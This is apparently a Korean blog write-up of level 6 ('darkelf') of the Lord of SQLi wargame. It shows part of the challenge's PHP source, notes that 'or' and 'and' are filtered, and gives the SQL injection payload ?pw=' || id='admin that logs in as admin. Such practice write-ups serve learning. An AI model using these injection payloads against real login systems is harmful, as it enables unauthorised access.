본문 바로가기
웹 해킹/lord of SQL

los 6번

by sonysame 2018. 6. 27. 
query : {$query}

"; 
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) echo "
Hello {$result[id]}
"; 
  if($result['id'] == 'admin') solve("darkelf"); 
  highlight_file(__FILE__); 
?>

or과 and 필터링!

or 대신 ||을 써준다.


?pw=' || id='admin


query : select id from prob_darkelf where id='guest' and pw='' || id='admin'


1' | id='heeyeon했을 때, 왜 guest로 로그인이 되는걸까?

저작자표시

'웹 해킹 > lord of SQL' 카테고리의 다른 글

los 8번  (0) 2018.06.28
los 7번  (0) 2018.06.28
los 5번  (0) 2018.06.27
los 4번  (0) 2018.06.27
los 3번  (0) 2018.06.27

관련글

티스토리툴바